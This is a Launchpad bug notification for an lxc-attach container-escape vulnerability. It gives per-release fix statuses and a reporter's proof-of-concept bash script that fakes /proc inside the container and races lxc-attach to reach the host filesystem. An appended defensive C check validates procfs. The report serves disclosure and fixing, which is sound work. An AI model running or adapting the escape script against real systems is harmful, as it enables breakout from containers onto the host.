This bug is missing log files that will aid in diagnosing the problem.
From a terminal window please run:

apport-collect 1639345

and then change the status of the bug to 'Confirmed'.

If, due to the nature of the issue you have encountered, you are unable
to run this command, please add a comment stating that fact and change
the bug status to 'Confirmed'.

This change has been made by an automated script, maintained by the
Ubuntu Kernel Team.

** Changed in: linux (Ubuntu)
       Status: New => Incomplete

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to lxc in Ubuntu.
https://bugs.launchpad.net/bugs/1639345

Title:
  lxc-attach to malicious container allows access to host

Status in linux package in Ubuntu:
  Incomplete
Status in lxc package in Ubuntu:
  Fix Released
Status in linux source package in Trusty:
  Fix Committed
Status in lxc source package in Trusty:
  Fix Released
Status in linux source package in Vivid:
  Fix Committed
Status in lxc source package in Vivid:
  Fix Released
Status in linux source package in Xenial:
  Fix Committed
Status in lxc source package in Xenial:
  Fix Released
Status in linux source package in Yakkety:
  Fix Committed
Status in lxc source package in Yakkety:
  Fix Released

Bug description:
  A malicious root user in an unprivileged container may interfere with
  lxc-attach to provide manipulated guest proc file system information
  to disable dropping of capabilities and may in the end access the host
  file system by winning a very easy race against lxc-attach.

  In guest sequence:

  cat <<EOF > /tmp/test
  #!/bin/bash -e
  rm -rf /test || true
  mkdir -p /test/sys/kernel
  echo "proc /proc proc rw,nosuid,nodev,noexec,relatime 0 0" > /test/mounts
  echo 0 > /test/sys/kernel/cap_last_cap
  mkdir -p /test/self
  mknod /test/self/status p
  cd /proc
  mount -o bind /test /proc
  while true; do
    pid=\$(ls -al */exe | grep lxc-attach | sed -r -e 's/.* ([0-9]+)\\/exe ->.*/\\1/')
    if [ "\${pid}" != "" ]; then
      cd /
      umount -i -f -l -n /proc
      exec /LxcAttachEscape "\${pid}" /bin/bash
    fi
    sleep 1
  done
  EOF

  See attachment for LxcAttachEscape.c

  Exploit uses fixed fd=7 for attacking; on other test environments, it
  might be another fd. Tests were performed by attacking lxc-attach
  started by

  screen lxc-attach -n [guestname]

  which is the sequence required against the TTY-stealing attacks also
  not fixed in all lxc-attach versions.

  In my opinion two bugs might need fixing:
  * lxc-attach should not use untrusted/manipulated information for proceeding
  * kernel should prevent against ptracing of lxc-attach as it was created in another USERNS

  
  # lsb_release -r -d
  Description:    Ubuntu 16.04.1 LTS
  Release:        16.04

  # apt-cache policy lxc1
  lxc1:
    Installed: 2.0.5-0ubuntu1~ubuntu16.04.2
    Candidate: 2.0.5-0ubuntu1~ubuntu16.04.2
    Version table:
   *** 2.0.5-0ubuntu1~ubuntu16.04.2 500
          500 http://debarchive-ehealth.d03.arc.local/ubuntu xenial-updates/main amd64 Packages
          100 /var/lib/dpkg/status
       2.0.0-0ubuntu2 500
          500 http://debarchive-ehealth.d03.arc.local/ubuntu xenial/main amd64 Packages

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/linux/+bug/1639345/+subscriptions
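
One way to apply the first suggestion in the description (not trusting manipulated proc information), as an added example that is not code from the bug report or from LXC: before reading cap_last_cap, confirm that both the directory and the file actually live on a procfs. The helper names and the temporary directory are assumptions made for illustration.

```c
#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/vfs.h>

#ifndef PROC_SUPER_MAGIC
#define PROC_SUPER_MAGIC 0x9fa0 /* procfs magic, as in <linux/magic.h> */
#endif

/* Hypothetical helper: 1 if fd lives on a real procfs, 0 otherwise. */
static int on_procfs(int fd)
{
    struct statfs s;
    return fstatfs(fd, &s) == 0 && s.f_type == PROC_SUPER_MAGIC;
}

/* Read cap_last_cap below proc_root; -1 unless directory and file are both on procfs. */
static int trusted_cap_last_cap(const char *proc_root)
{
    char buf[16] = {0};
    int val = -1, fd = -1;
    int dir = open(proc_root, O_RDONLY | O_DIRECTORY | O_CLOEXEC);
    if (dir < 0)
        return -1;
    if (on_procfs(dir)) /* a bind-mounted ordinary directory fails here */
        fd = openat(dir, "sys/kernel/cap_last_cap", O_RDONLY | O_CLOEXEC);
    close(dir);
    if (fd < 0)
        return -1;
    if (on_procfs(fd) && read(fd, buf, sizeof(buf) - 1) > 0)
        val = atoi(buf);
    close(fd);
    return val;
}

int main(void)
{
    char fake[] = "/tmp/fakeprocXXXXXX"; /* constructed stand-in for the /test tree */
    if (!mkdtemp(fake))
        return 1;
    printf("real /proc: %d\n", trusted_cap_last_cap("/proc"));
    printf("fake tree : %d\n", trusted_cap_last_cap(fake));
    rmdir(fake);
    return 0;
}
```

This covers only the manipulated-procfs input; the ptrace race in the description is the subject of the second suggestion, on the kernel side.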
